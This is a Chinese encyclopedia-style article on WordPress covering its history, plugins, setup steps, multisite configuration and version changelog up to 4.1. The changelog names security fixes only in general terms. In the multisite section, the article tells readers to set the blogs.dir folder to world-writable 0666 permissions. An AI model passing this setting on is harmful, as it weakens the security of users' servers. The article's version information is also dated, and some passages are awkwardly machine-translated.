WordPress概述
WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的。用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。
WordPress有许多第三方开发的免费模板,安装方式简单易用。不过要做一个自己的模板,则需要你有一定的专业知识。比如你至少要懂的标准通用标记语言下的一个应用HTML代码、CSS、PHP等相关知识。
WordPress官方支持中文版,同时有爱好者开发的第三方中文语言包,如wopus中文语言包。WordPress拥有成千上万个各式插件和不计其数的主题模板样式。
1软件介绍编辑WordPress是一个免费的开源项目,在GNU通用公共许可证下授权发布。
2014年12月23日发布WordPress 4.1,发行代号“Dinah”。
WordPress被认为是Michel Valdrighi所开发的网志平台b2/cafelog的正式继承者。“WordPress”这个名字出自Christine Selleck的主意,他是主要开发者Matt Mullenweg的朋友。
WordPress 功能强大,插件众多,易于扩充功能。安装使用都非常方便。
WordPress 的原版是英文版的,UTF-8编码,2014年12月23日发布4.1版(详见wordpress官网)。2013 年 06月 22日的3.5.2版,其版本的别称是“Elvin”,献给鼓手 Elvin Jones 等。WordPress 3.5要求 PHP 版本至少为 5.2.4(不支持第三方推出的“PHP6.0”),mysql版本至少为5.0。为满足日益庞大的中文用户需求开辟了中文官方站点且提供中文版程序下载。还有爱好者开发了中文语言包,使其可以支持中文。不过,由于使用的编码原因,中文字符截断时会出现乱码。不过桑葚网友制作的中文 WordPress工具箱插件可以解决这个问题。
使用WordPress平台的发行商约占全球网站的10%。而WordPress官方网站的每月独立访问用户数则达到3亿。
从3.0开始,WordPress已经内置多用户博客的功能,可以通过简单的设置就开设一个支持多域名的博客平台。
WordPress 是世界上使用最广泛的博客系统,是一款开源的PHP软件。因为使用者众多,所以WordPress社区非常活跃,有丰富的插件模板资源。使用WordPress可以快速搭建独立的博客网站。
WordPress 不仅仅是一个博客程序,也是一个优秀的小型CMS,很多非博客网站也是用WordPress搭建的。2插件模板编辑WordPress 拥有
[WordPress] WordPress
世界上最强大的插件和模板,这也是WordPress非常流行的一个特性。当前WordPress插件数据库中有超过18000个插件,包括SEO、控件等等。个人可以根据它的核心程序提供的规则自己开发模板和插件。这些插件可以快速地把你的博客改变成cms、forums、门户等各种类型的站点。WordPress Theme 风格模板是世界上的程序里最多的,类型复杂,品质可嘉,样式繁多,只需要把不同的模板文件放到空间的Theme目录下就可以自由的在后台变幻,方便使用,而且不管你安装的的什么语言包,都可以自由的使用这些风格。只需要把插件文件上传到你 FTP 的 plugin 目录下,就可以直接在后台启用管理,甚至功能强大点的插件会有一个自己的管理目录在后台出现,就像程序自带似的方便,这些插件囊括了几乎所有互联网上可以实现的功能,比较著名的插件有:
你好多莉——好玩~--这不是普通的插件,它象征着一代人希望和热情,浓缩成 Louis Armstrong 的四个字:你好,多莉。在启用后,在您站点后台每个页面的右上角都可以看到一句来自《俏红娘》音乐剧的英文原版台词。
wp slug translate——很实用的一个插件,当你设置了按文章名字来自动填写固定链接的时候,它可以自动帮你翻译成英文,实在不能翻译也能自动转化成拼音。如果你写中文博客,这真的很有用,避免了乱码的出现!--set slug by translate title or slug from chinese to english with google translate or pinyin. 通过将title用google translate 翻译成英语或者拼音.
Link Manager——wordpress 3.5.1的链接呢?!没事,装了这个插件,立马就回来了!--Enables the Link Manager that existed in WordPress until version 3.5.
Most Popular Posts——按照评论的多少排列,显示热门文章!--Display a link to the most popular posts on your blog according to the number of comments.
MO Widgets——可以设置侧边栏在不同的页面显示不同的内容!--Useing it can easier to control your Widgets.Adds checkboxes to choose your Widget to show or hide on different pages;and add a Widget with support for including PHP.Thanks for Display widgets and Samsarin PHP Widget.|灵动边栏插件,使用它将使你更容易的控制你的边栏显示,安装激活以后会在小工具页面显示控制各个小工具在博客中任何页面是否显示,以实现不同页面不同侧边栏的效果;同时在小工具页面产生一个支持php语言的文本小工具,让你更容易的添加属于自己的边栏小工具.此插件在Display widgets和Samsarin PHP Widget基础上修改,在此感谢原作者.
WP No Category Base - WPML compatible——把文章分类的URL中的“category”去掉
GoogleXMLSitemaps——帮助你的网站更容易被google等搜索引擎收录!--This plugin will generate a special XML sitemap which will help search engines like baidu
值得注意的是,由于有些网站被qiang了,所以导致个别插件没法使用,因此就不再在这里一一列举了!3优缺点编辑
优点
WordPress 功能强大、扩展性强,这主要得益于其插件众多,易于扩充功能,基本上一个完整网站该有的功能,通过其第三方插件都能实现所有功能;
wordpress搭建的博客对seo搜索引擎友好,收录也快,排名靠前;
适合DIY,如果你是喜欢丰富内容的网站,那么wordpress可以很好地符合你的胃口。
主题很多,网站上一大片都是wordpress的主题,各色各样,应有尽有!
wordpress备份和网站转移比较方便,原站点使用站内工具导出后,使用WordPress Importer插件就能方便地将内容导入新网站。
wordpress有强大的社区支持,有上千万的开发者贡献和审查wordpress,所以wordpress是安全并且活跃的。
缺点
wordpress源码系统初始内容基本只是一个框架,需要时间自己搭建;
插件虽多,但是不能安装太多插件,否则会拖累网站速度和降低用户体验;
服务器空间选择自由较小!
静态化较差,确切地说是真正静态化做得不好,如果要想对整个网站生成真正静态化页面,还做不好,最多只能生成首页和文章页静态页面,所以只能对整站实现伪静态化!
wordpress的博客程序定位,简单的数据库层等都注定了他不能适应大数据。
4功能编辑
介绍[WordPress] WordPress
因为Wordpress强大的扩展性,很多网站已经开始使用Wordpress作为内容管理系统来架设商业网站。WordPress提供的功能包括:
1.文章发布、分类、归档、收藏,统计阅读次数。
2.提供文章、评论、分类等多种形式的RSS聚合。
3.提供链接的添加、归类功能。
4.支持评论的管理,垃圾信息过滤功能。
5.支持对样式CSS和PHP程序的直接编辑、修改。
6.在Blog系统外,方便的添加所需页面。
7.通过对各种参数进行设置,使Blog更具个性化。
8.在某些插件的支持下实现静态html页面生成(如WP-SUPER-CACHE)。
9.通过选择不同主题,方便地改变页面的显示效果。
10.通过添加插件,可提供多种特殊的功能。
11.支持Trackback和pingback。
12.支持针对某些其它blog软件、平台的导入功能。
13.支持会员注册登录,后台管理功能。特色所见即所得的文章编辑器
模板系统,也成为主题系统
[WordPress] WordPress
统一的链接管理功能
为搜索引擎而优化的永久链接(PermaLink)系统
支持使用扩充其功能的插件
对于文章可以进行嵌套的分类,同一文章也可属于多个分类
TrackBack和Pingback的功能
能产生适当的文字的格式和式样的排版滤镜
生成和使用静态页面的功能
多作者共同写作的功能
可以保存访问过网志的用户列表
可以禁止来自一定IP段的用户的访问
支持使用标签(Tags)5建站流程编辑1. 注册域名
一般注册.com域名就可以了,而且价格也不贵,基本上是70元一年。
2. 申请虚拟主机
虚拟主机运营商很多。国内主机速度快,但比较贵,而且空间一般比较小;国外主机便宜,且空间大多没有限制,但速度比国内主机慢。如何取舍就 看大家对于自己博客的定位了。如果只是用博客写写文章的话,推荐还是用国内的主机,如果是建论坛或者资源站点,经常需要上传附件的话,最好选用国外的不限空间的主机。
3. 在虚拟主机上绑定自己的域名
使用虚拟主机控制面板绑定申请的域名。
大多数虚拟主机绑定域名都很简单,实在不会的话,可以找虚拟主机的客服。
4. 下载WordPress程序
在WordPress中文官网上下载最新的WordPress程序。
5. 修改域名的DNS解析
为什么在浏览器上输入你的域名,就会显示你的主页呢。这就要靠DNS解析了。域名注册商都会提供一个域名管理系统,在里面可以修改自己域名的DNS 解析。将DNS解析到自己购买的虚拟主机上就可以了。虚拟主机的地址在虚拟主机提供商的控制面板上可以查看到,一般在绑定域名的页面会显示。
6. 创建WordPress数据库
国外的主机的有一好处是可以创建数据库。而国内主机一般要另行购买。
在控制面板中创建数据库,记下数据库的主机地址、数据库名称、用户名、密码,这四个要素。
7. 修改WordPress的安装配置文件。
就是修改wordpress程序包中的wp-config-sample.php文件,将第6步中记下的主机地址、数据库名称、用户名、密码填入相应的位置就可以了,并重命名为wp-config.php。
8. 上传WordPress程序至ixwebhosting主机域名空间
这步使用ftp上传就可以了。很简单。
9. 访问 域名/wp-admin/install.php进行wordpress安装。填写博客信息及邮箱。
这一步最轻松,完全傻瓜化,自动化。填邮箱的时候填第4步的域名邮箱比较好。当然也可以填自己的常用邮箱。
另,随着BAT云平台的推出,建站变得更加方便。比如,百度云平台已有相关教程。[2] 6版本介绍编辑
WordPress 2.7WordPress 2.7最大的不同来自后台界面的重新设计,更加合理的布局和更多方便的功能,比之 2.6 版本,2.7版本在宽屏上显示就漂亮许多了。
控制板组件化,可以随意组合,隐藏,显示组件,快速发布功能,线程化可分页评论,直接在控制板里回复评论,直接安装插件,还有一个不能不提到的:自动升级 WordPress 功能,以后你将不用再重复下载、解压、上传文件的步骤,WordPress会自动帮你完成。
WordPress 2.7 还有更多的细节和功能等你去发现,别忘了,升级前请先备份老系统。
升级WordPress 2.7前,请确认您是否已经备份过您修改过的文件,如 index.php。
从任何较早版本的 WordPress 升级到 2.7:备份您修改过的文件,并删除所有旧的 WordPress 文件。上传所有新文件。在浏览器中打开 /wp-admin/upgrade.php。升级完成。WordPress 2.82009年5月24日,WordPress官方推出了WordPress 2.8 beta2。
新版本最大的亮点就是主题的后台一键安装,WordPress官方设置了主题筛选的功能,可以根据 颜色、栏数、主题宽度、功能和博客类型进行主题的筛选,也可以查看最新上传的主题,当然,也可以根据标签和作者搜索主题。这些搜索功能是可以并用的,功能很强大。
2009年6月10日,WordPress正式释出2.8正式版。
2.8的代号为“Baker”,这个代号是为了向小号声乐家“Chet Baker”致敬而起的。
2009年7月10日,WordPress正式释出2.8.1正式版。
WordPress2.8.1正式版修正了许多BUG和增加了安全的插件管理页面。安全技术公司通知我们,管理网页添加某些插件可以被认为是无特权的用户,导致信息泄漏。并不是所有的插件很容易受到这个问题,但我们建议升级到2.8.1正式版
2009年8月12日,WordPress正式释出2.8.4正式版。又是安全更新,涉及到用户登录信息验证,建议尽快更新。其实更新就三个文件,用新版本的:wp-login.phpwp-includes/version.phpreadme.html覆盖2.8.3的文件即可。
WordPress 2.9 Beta 2
来自WordPress官方开发博客的消息,WordPress 2.9 Beta 2已经发布测试。相比WordPress 2.9Beta1,一共增加或修正了117个BUG,由于WordPress2.9的增加的主要功能已经确定,所以,这次更新主要是优化代码修复BUG,不涉及安全更新,也没有新功能更新。
Wopus整理了一份主要更新列表:大量更新、优化WordPress后台JS代码。优化后台插件编辑功能。优化后台页面CSS代码。优化Widgets代码和CSS。增强主题编辑功能,优化主题编辑CSS代码。优化内容编辑器。优化评论ajax效果,改进评论CSS代码。优化后台多媒体功能代码。
每次更新主要都是集中在wp-includes和wp-admin目录,有需要测试的朋友,可以直接到官方下载即可,也可以在Wopus首页右侧顶部下载。
WordPress 2.9.1
根据WordPress官方开发博客的消息,WordPress 2.9.1已经发布。WordPress 2.9.1是对上一版本的进一步优化。
WordPress 2.9.2
新版本修复关于回收站的一个多用户权限问题(这个安全漏洞非常严重可能会造成blog被非法入侵并修改文章类容)。其它的没有改变也没有性能上的提升。
WordPress 3.0正式版
WordPress 3.0正式版于2010年6月18日正式发布,新版本主要添加功能包括:
1.多站点功能(Multisite): WordPress和WordPressMU的整合。你可以使用WordPress创建多个网站了。
2.全新的WordPress默认主题 “Twenty Ten” 充分使用了WordPress 3.0的各种新增功能,如果你是一个开发人员,要熟悉3.0,那研究一下这个主题是很好 的入口。
3.自定义菜单管理功能:你可以在后混合页面、分类和自定义链接,创建一个或多个菜单。
4.自定义头部和背景的API: 开发人员可以少写很多代码了。
5.更友好的后台Help Tab:在WordPress后台,在不同页面点击help将显示更多的帮助信息,对于WP的新用户来说很实用。
6.在安装的时候可以选择用户和密码了。
7.可批量更新主题了。
8.对自定义文章类型(Custom posttypes) 和自定义分类系统Custom taxonomies 进行了改良。自定义分类系统从此版本开始支持层级关系了。
WordPress3.0新特性多站点功能(Multisite)开启设置:
原来wordpress3.0的多站点功能(Multisite)默认是没有开启的,需要手动修改设置,后台管理才会出现功能选项按钮。WordPress3.0新特性多站点功能(Multisite)开启设置方法:修改网站中的wp-config.php文件,在其末尾添加下列代码:define('WP_ALLOW_MULTISITE','true'); 修改之后,登陆后台管理页面,你将会发现,侧边栏“工具(Tools)”菜单下,将会多出一个“网络(Networks)”选项。
点击“网络(Networks)”选项,进入多站点设置,填写将要开启新站点的名称(Network Title)和管理员邮箱(Admin E-mail Address),并点击安装(install)。注意:开启之前,必须停用所有插件。安装之后,按照提示,需要在网站文件夹 wp-content 目录下创建一个名为blogs.dir 的文件夹,用来存储新开站点上传的多媒体文件,同时必须将 blogs.dir 文件夹的读写权限更改成0666 (-rw-rw-rw-)以确保该目录可写。
将弹出页面中的第二项中的代码,也就是按照提示复制到你的 wp-config.php中的 /* That’s all,stop editing! Happyblogging. */ 这段文字的上方。再将第三项中的代码复制到 .htaccess 文件中,覆盖其他 WordPress 规则,注意哦,这里是覆盖,也就是说原来的内容不需要了。上面的步骤就开启了WordPress3.0新特性多站点功能(Multisite),点击顶端的弹出框的“配置页面”,进入详细设置页面。
其他设置只要按要求填写就好了。但这里要注意“允许注册”这一项,如果你想要给用户开启多站点功能,那个站点创建是一定要的,就比如说最后一项“站点和用户帐户都可被创建”,这个选项就表示,用户可以注册帐号,并且可以在你的博客里注册新博客。
WordPress 3.0.1
本版本是在WordPress 3.0基础上的修正版,共修复前一个版本多达50个已出现的问题。而3.0以上版本针对2系列版本进行了大幅度修改包括:
WordPress 和 WordPress MU 已经合并,一个 WordPress 安装就能管理多个博客。(需要安DEMO装插件)
WordPress 3.0 新推出了 “Twenty Ten” 的默认主题,它包含了 WordPress 所有的功能。
新的菜单管理系统,可以让你创建包含由日志,页面,分类,标签和其他链接组成的完全自定义菜单。
自定义 header (头图)和背景颜色或者图片的 API。
WordPress 后台每个界面的帮助标签下都有上下文帮助。
全新安装的 WordPress 可以自定义帐号和密码。
在编辑主题的时候会自动进入维护模式。
支持短连接。
支持和改进了自定义日志类型和自定义分类系统。
一个更轻快颜色的后台,让你更加关注你的内容。
WordPress 3.0.5
核心程序方面,这是一个安全更新,重点针对站点中有不确定用户的情况;在 WordPress China 方面,我们特别为您准备了“中国视频网站视频自动嵌入功能”,您只需在文章中另起一段,复制优酷网、56或土豆网视频播放页面的网址,即可轻松插入视频。(详情请安装/升级后,访问“控制板 → 设置 → 中文本地化”,点击上方的“帮助”查看。)
详细情况如下:
修复了两个中等危险的安全问题。在以往版本中,贡献者和作者可以自我提权。
修复了一个信息泄露问题。以往版本中,作者级别的用户可以通过某种方法看到他们不应看到的内容。
做出了两个增强安全性的更改:一个是为那些没有正确使用安全 API 的插件提供的,另一个是对我们之 前发布的补丁进行更深层的修正。WordPress 3.1此版本引入了
1)全新设计的链接方式—— 今后您可以以闪电般的速度将文字链接到站点中的其它文章或页面;
2)添加了“管理工具条”功能,使用常用功能将只需点击一次鼠标;
3)简洁的流程化写作界面默认隐藏了极少用到的功能(在“页面选项”中可恢复它们);
4)3.1 版本还提供了新的后台蓝色配色方案。
开发者也有糖吃 ——“文章形式”功能让开发者为主题设计“微博”文章格式更加顺手;
新内容管理系统(CMS)功能提供了用来显示自定义文章类型的归档页面支持;
此版本还包含了全新的“网络管理员”、导入和导出系统的改造、分类法高级查询等功能。
WordPress 3.1.1
WordPress 3.1.1 中文版本现已发布。此版本是修订版本,修复了 3.1 中包含安全问题在内的近 30 个问题。几个重要更新内容:
加强媒体文件上传的安全性性能改进增加对 ⅡS6 的支持修正分类和 PATHINFO(/index.php/)的固定链接问题修正了在某些极端情况下,数据库查询和分类法相关内容可能导致插件不兼容的问题3.1.1 版本包含了我们的安全团队成员、WordPress 核心开发者 Jon Cave 和 Peter Westwood 发现的 3 个安全问题。修复的内容分别是:修正媒体文件上传器包含的“跨站请求伪造”(CSRF)问题、修正在处理评论内容中极复杂链接时可能导致 PHP 崩溃的问题,以及修补“跨网站指令码”(XSS)漏洞。
WordPress 3.1.2
2011 年 4 月 27 日,WordPress 3.1.2发布,修补了版本中的安全漏洞。
版本中,投稿者级别的用户可以通过某种不正当方法发布文章。
问题是由我们的安全团队成员、WordPress 开发者Andrew Nacin和Benjamin Balter共同发现的。
我们建议您尽快更新,尤其是对于那些将默认用户角色设为了投稿者的站点。除此之外,本次更新还解决了一些没有来得及在 3.1.1 版本中修复的问题(英文)。WordPress 3.2Wordpress 发布,改进用户体验,让站长更好的建设自己的网站。
具体改进如下:后台样式2.默认主题
3.改进升级程序
4.广阔的写作空间
5.提升运行效率
6.PHP和MYSQL环境要求
详细可参考扩展阅读中"关注WordPress3.2"。
WordPress 3.1.4已经发布,这是一个维护和安全更新版本。这个版本更新主要是修复了编辑级别的用户可以恶意获得更多权限的bug。3.1.4同时也包括了其它的几个安全修复和安全加固措施。可以点击更新日志查看更新的内容。下载WordPress3.1.4或者在控制面板里面的更新获得版本。
WordPress 3.2.1
在 WordPress 3.2 版本下载量达到一百余万次之后,我们发布WordPress 3.2.1。这个维护版本修复了一些服务器上可能发生的 JSON 不兼容问题,同时还包括控制板样式和 Twenty Eleven 主题的小修补。
要查看所有修改,请访问中文 Codex 文档页面、更新历史(英文)或解决的工单列表(英文)。WordPress 3.3最新最棒的 WordPress 版本 —— 3.3 版本推出!本版本代号“Sonny”,献给伟大的爵士萨克斯手 Sonny Stitt 先生。您就可以在控制板升级啦!哦对了,差点忘了告诉您,从这个版本开始,中文版本将更强大的控制板(dashboard)改称为“仪表盘”了。
自 3.0 版本以来,WordPress 已经有了六万五千余次下载了,作为第三次对 3 系列的修订,本版本主要显著提升了您的使用体验:导航菜单、上传机制,以及导入以往备份等等。
面向用户
有经验的用户一定会喜欢全新的“拖放上传工具”、鼠标悬浮式导航菜单、一体化工具栏、增强的合作编辑体验、以及 Tumblr 导入工具。我们也关注新用户的体验。3.3 版本新增了“气泡提示”功能,在每次更新后,在功能上大幅度的改动会主动弹出提醒用户。同时,使用 3.3 版本新安装 WordPress 的用户会看到一个非常友好的消息框,提示如何开始使用 WordPress。每个页面上的“帮助”选项卡也有显著改进,实用性得到极大提升。站点的“仪表盘”也更加兼容 iPad 和其它平板电脑了。
中文版本方面本次新加入了中文字数统计功能,在您写文章时会自动统计中文字数和英文词数之和。
WordPress 3.3.1
这次WordPress的改动不大,总的来说是一个维护版本,这个维护版本修复了15个问题以及WordPress 3.3中存在的一个跨站点脚本漏洞。
WordPress 3.3.2
WordPress 3.3.2版本,有一个安全更新,解决了一些以前版本中发现的安全漏洞。根据官方公告,三个外部库获得安全更新:Plupload,SWFUpload和SWFObject。上述漏洞由 Neal Poole、 Partlan和Szymon Gruszecki三人披露。WordPress的3.3.2还解决了由该组织的核心安全团队确定的一些其他问题:
plupload(版本1.5.4),WordPress的上传媒体使用。
SWFUpload,WordPress的先前用于上传媒体,仍可能在插件中使用。
SWFObject,WordPress的先前用于嵌入Flash内容,并仍可能在插件和主题中使用。
WordPress 3.3.2也更新了:
网站管理员可以停用网络范围内的插件时,在特定情况下运行,是一个WordPress网络特权升级。
点击网址时的跨站点脚本漏洞。
当在旧版本的浏览器中进行评论和过滤网址后重定向跨站点脚本漏洞。WordPress 3.4WordPress 3.4发布更新,命名为吉他手Grant Green(guitarist Grant Green)。之所以将WordPress 3.4版本称为Green,是为了向吉他手Grant Green表示敬意,因为他深情而朴素的音乐在这个版本的开发过程中一直陪伴着大家。
WordPress 3.4在主题定制、自定义头部、Twitter的嵌入和图片标题等方面有了许多重大的改进。
新功能:
⒈主题预览功能增强
⒉头部大小可自定义
⒊可从媒体库中选择自定义头部和背景
⒋改进的查找和选择主题
⒌主题和插件的其它改进
改进:
⒈新的XML-RPC API(移动开发用的);
⒉自定义头部和背景API;
⒊WP_Query性能提升;
⒋国际化支持(主要是语言和本地化UI);
⒌当有大量已安装主题时的性能和API改进;
⒍支持直接从主题目录中安装子主题(即主题和子主题可以放一块了)。
WordPress 3.4.1
WordPress 3.4.1英文版及中文繁体版发布更新,中文简体版没有同步更新。这次的更新主要是3.4版本的一些bug。没有涉及功能性的改变。
修复了其中一个主题的页面模板,有时无法检测到的问题。解决一些类别一篇结构的问题。为更好地处理插件或加载的JavaScript错误的主题。添加上传的iOS 6设备上的图像的早期支持。允许常用的插件,用来检测网络的广泛激活的技术。运行某些版本的PHP(5.2.4,5.4)的服务器或罕见的设置(安全模式中,open_basedir),这造成了警告或在某些情况下更好的兼容性,防止被发送的电子邮件。3.4.1版还修复了一些安全问题,并包含了一些安全加固。这些漏洞包括潜在的信息披露,以及一个错误,影响多址安装不受信任的用户。由WordPress安全团队发现并解决了这些问题。
WordPress 3.4.2
2012年9月7日更新,该版本是个安全修复版本。
修复旧浏览器在后台管理区域的若干问题
修复某些情况下主题不能正确预览,或者缩略图不能正确显示的情况
提升插件兼容性
解决在某些固定链接结构下的翻页问题
禁止不当大小的顶部图片上传
避免某些引用通告和引用嵌入错误。4.2版本还修复了一些安全问题和做了些安全加固,该缺陷存在特权提升bug。在本次 3.4.2 版本更新中,引入了一个新的问题,导致自定义栏目功能无法使用。该问题已在 Trac 被确认。该问题在 SVN 中已被修复,在下一个版本中会包含这部分的修复代码。如果不想等待,请安装 Hotfix 插件来即时修复该问题。需要了解详情请看扩展阅读。WordPress3.5版本2012 年 12 月 , WordPress 3.5 正式版本已经发布。5版本最大的变化就是全新设计的照片上传和相册创建界面。多媒体功能不好用一直是 WordPress 的缺点,所以我们在这个版本中重点对此进行了加强。3.5 版本还包含了 Twenty Twelve 主题。它简洁、适用各种用途、可以在各种屏幕尺寸上查看。最后,我们对“仪表盘”的设计细节进行了优化,新功能包括对 Retina 显示屏的支持、选色器等
5版本的另一个重大变化是:在后台管理界面中最大的变化是链接管理不见了!这对于WordPress来说是一个有趣的事情,因为这几年来WordPress一直由于它越来越臃肿的体型而被诟病。当然这个变化也在WordPress社区中引发了无数的讨论,因为对于使用大量友情链接的用户来说,不见的链接管理确实是一个问题。不过正如之前所说,WordPress还是通过官方插件"Link Manager"的形式来补全了这个功能。事实上,这个插件只有一个只包含一行代码的php文件,如果你打开link-manager.php文件看一下,就发现下面这行代码:
add_filter( 'pre_option_link_manager_enabled', '__return_true' );WordPress 3.5.1版本修复 37 个问题。这也是一个安全更新。注意:由于一个程序问题,Windows 上运行 IIS 的用户无法自动从 3.5 升级到 3.5.1.请参考文档进行手动升级。
编辑器:解决 HTML 元素可能意外消失的问题。
多媒体:修正若干小工作流程问题和兼容性问题。
多站点:在创建新网络的时候提示使用正确的重写规则。
避免定时发布的一些 HTML 标签在发布时消失的问题。
临时解决了错误配置可能造成的仪表盘 JavaScript 异常的问题。
隐藏了插件错误使用数据库或用户 API 时的警告。由于一个程序问题,Windows 上运行 IIS 的用户无法自动从 3.5 升级到 3.5.1.参见文档(英文,请登录翻译)来手动升级。
WordPress 3.5.1 解决的安全问题如下:
使用 pingback 的远程端口扫描问题。该问题可能导致服务器信息泄露,或被攻击。这个问题影响所有的 WordPress 版本。特别感谢安全研究员 Gennady Kovshenin 和 Ryan Dewhurst 评估我们的工作。
shortcode 和文章内容的两处跨站攻击漏洞。由 WordPress 安全小组 Jon Cave 发现。
外部库 Plupload 的跨站漏洞。感谢 Moxiecode 开发者和我们一起研究、解决问题,感谢他们发布 Plupload 1.5.5.WordPress 3.5.22013 年 6 月 22 日,WordPress 3.5.2 简体中文版现已可用。这是 3.5 版本的第二个维护性发布,修复了 12 个 bug。这是对所有之前版本的安全更新,我们推荐您立即升级您所有的站点。WordPress 安全小组解决了 7 项安全问题,并且这次发布也包含了其他一些安全强化措施。
安全修复包括:
阻止了服务器端伪造请求攻击。该问题可能使得攻击者取得网站的权限。
禁止了贡献者不适当地发布文章或修改文章的作者,分别由 Konstantin Kovshenin 和 Luke Bryan 报告。
更新了 SWFUpload 外部库来修复跨站脚本隐患,由 mala 和 Szymon Gruszecki 报告。
阻止了一种拒绝服务攻击,这种攻击可能影响到使用受密码保护的文章的网站。
更新了 TinyMCE 外部库来修复跨站脚本隐患,由 Wan Ikram 报告。
修复了多种跨站脚本,由 Andrea Santese 和 Rodrigo 报告。
避免了在文件上传失败时透露完整路径,由 Jakub Galczyk 报告。WordPress3.6测试版2013年4月4号,WordPress官方博客发布了WordPress3.6测试版!
文章的格式:文章的格式和现有自己的UI和主题模版函数来完成访问结构化数据的过程;
二十三:我们在新的版本中,继续采用新的默认主题——二十三!二十三是一个无可挑剔的,色彩丰富,以博客为中心的主题,充分利用新邮支持格式。
音频/视频到您的文章,您可以嵌入音频和视频文件,无需依赖插件或第三方媒体托管服务。
自动转存:帖子本地自动保存。如果您的浏览器崩溃,您的计算机死亡,或者为你节省服务器脱机,您不会失去您的文章。
发布锁定:当有人正在编辑一个帖子,如果他们在自己的键盘上睡着了,那么它将被自动踢出来,
导航菜单:默认菜单已简化与手风琴UI,和一个单独的标签批量分配的菜单位置。
修订:新修订的UI功能界面,滑块,“磨砂”,通过历史,双滑盖范围比较。WordPress 3.62013年8月2日发布,新特点:
——全新的2013主题
新主题Twenty Thirteen是一个色彩丰富、以博客为中心的主题,并且支持所有的文章格式。
——改善的Revisions修订功能
修订功能将保存每一次的改动,并且新的界面允许你滚动查看是谁在什么时候做出了哪些修订,还可以快速恢复到任何修订版。
——自动保存和文章锁定
文章会自动保存在本地。如果你的浏览器崩溃,计算机死机,或者服务器掉线,都不会失去你的文章。对于多作者的网站,文章锁定可以防止出现内容错乱。
——内置HTML5媒体播放器
你可以直接在文章中嵌入音频和视频文件,无需依赖插件或第三方服务。WordPress 3.7.12013年10月30日发布,新特点:有说明的图像可在可视化编辑器中正确显示。
使得部分较旧或未得到妥善配置的服务器上的站点能够继续从官方网站检查更新。
防止因部分插件过早地调用部分WordPress函数而造成的致命错误。
修正了get_pages()中的层级排序、wp_list_categories()中的排除项、和以空值调用in_category()时的行为。
修复了在搜索时可能出现的警告和一些其他提示。
WordPress 3.82013年12月13日发布,此版本命名为“Parker”,以纪念查利·帕克,波普爵士乐的先驱者。这可能是迄今为止最美丽的更新。新特性:Modern审美界面设计:新的WordPress版本整个界面焕然一新,干净清晰简洁。
利落的版式:The Open Sans版式提供了简洁、友好的文本显示模式,并且能够根据桌面或者移动端进行自动适应。
精致的对比:凭借卓越的对比度和宽大舒适的类型,新的设计很容易阅读和愉快浏览。
高速环境下的高清显示:WordPress能够根据你的屏幕来自动调整文字的显示,新的矢量图形在页面缩放中能够比以往任何时刻都来的清晰。
管理员配色方案:WordPress包含了8个全新的管理员配色方案,能够在你的设置页面中进行预览和更换。
精致的主题管理:新的主题屏幕能够让你的主题一目了然。
丰富的小工具:小部件已经被简化。在大型屏幕中显示能够显示多个部件的叠加。在平板上只需要一个小工具就能来添加它。
WordPress 4.12014年12月23日发布,此版本命名为“Dinah”,以纪念爵士歌手黛娜·华盛顿。WordPress 4.1中的新功能帮助您聚焦于您的写作,新的默认主题也能让您有型地展示您的文章。新特性:
Twenty Fifteen新主题:最新的默认主题,是一套以明晰为中心的面向博客的主题,简单的排版在任何屏幕尺寸上都容易阅读。。
免打扰写作:有时,您需要集中精力遣词造句。试试打开免打扰写作模式,在您开始打字时,所有会让您分心的东西都会淡出,让您只注意您的写作。您的所有编辑工具都会在您需要用到它们时立刻出现。
细节变化:WordPress 4.1已经有了40多种语言版本;如忘记在公用电脑上登出,现在可以前往个人资料页面并登出所有会话;嵌入来自Vine的视频也已被简化为了将URL粘贴进文章里;插件安装器现在会为您推荐值得一试的插件,推荐是基于您和其他用户已经安装的插件做出的。历史版本WordPress的发行版都用著名的爵士音乐家的名字命名。举例来说,WordPress 1.2的代号为Mingus(咆勃爵士乐中贝斯手Charles Mingus的姓)。
WordPress 1.5在2005年2月中旬发布,代号为Strayhorn。它新增了一系列重要的新功能。其中一个是能够管理静态页面。这使得用户可以创建和编辑脱离传统博客的时间排列方式的页面,这也是WordPress从简单的博客管理软件成为一个全面的内容管理系统(CMS)的第一步。另一个新增功能是新的模板/主题系统,从而可以让用户轻松启动和关闭“皮肤 ”(模板)。在WordPress还配备了新的默认模板(代号为Kubrick)设计者为Michael Heilemann。
WordPress 2.0在2005年12月发布,代号为Duke。这个版本加入了富文本编辑功能,更好的管理工具,图片上传功能,更快的发布功能,改进的导入系统,以及彻底变革的后端管理部分。WordPress 2.0也为插件开发者带来了很多进步和改变。
WordPress 2.1在2007年1月22日发布,代号为Ella。除了解决安全问题的一些更新以外,2.1版还增加了重新设计的界面和增强的编辑工具(包括集成拼写检查和自动储存),改进的内容管理选项,以及各种代码和数据库的优化。
WordPress 2.2在2007年5月16日发布,代号为Getz。2.2版的特性包括在模板中支持窗口小部件(Web widget),更新对Atom Feed的支持,以及速度上的优化。
WordPress 2.3在2007年9月24日发布,代号为Dexter。2.3版本的功能包括:内置了标签(Tags)的支持,新的分类系统,更新的通知功能,以及其他界面的改善。2.3也充分支持遵循发布协议的Atom 1.0。在WordPress 2.3还包括一些急需的安全性修正。
WordPress 2.5在2008年3月29日发布,代号为Brecker。开发者跳过发行版2.4而直接发布2.5 ,所以2.5版包含算得上两个版本号更新的新代码。WordPress 2.5有着一个彻底重新设计的管理界面,甚至WordPress的官方网站也进行了重新设计以配合新的风格。
WordPress 2.6在2008年7月15日发布,代号为Tyner。它包含了许多新功能,使得WordPress成为了一个更加强大的内容管理系统(CMS):可以跟踪每一篇文章和页面的修改(比较适用于多人协作撰写的博客,以及从互联网的任何地方发出文章的功能,以及几十个对2.5版引入的新功能的改善。7相关信息编辑
开发者WordPress的主要的开发者是Ryan Boren和Matthew Mullenweg。 Matthew Mullenweg和Mike Little是这个项目的共同创办人。 做出主要贡献的开发者包括:
Dougal Campbell Mark Jaquith
Donncha O'Caoimh Andy Skelton
Michel Valdrighi Peter Westwood
虽然WordPress有很大一部分是由它的爱好者团体所开发和维护的,但是它的主要开发者其实大多是Automattic公司的雇员,WordPress也就因此与该公司有着密切的联系。
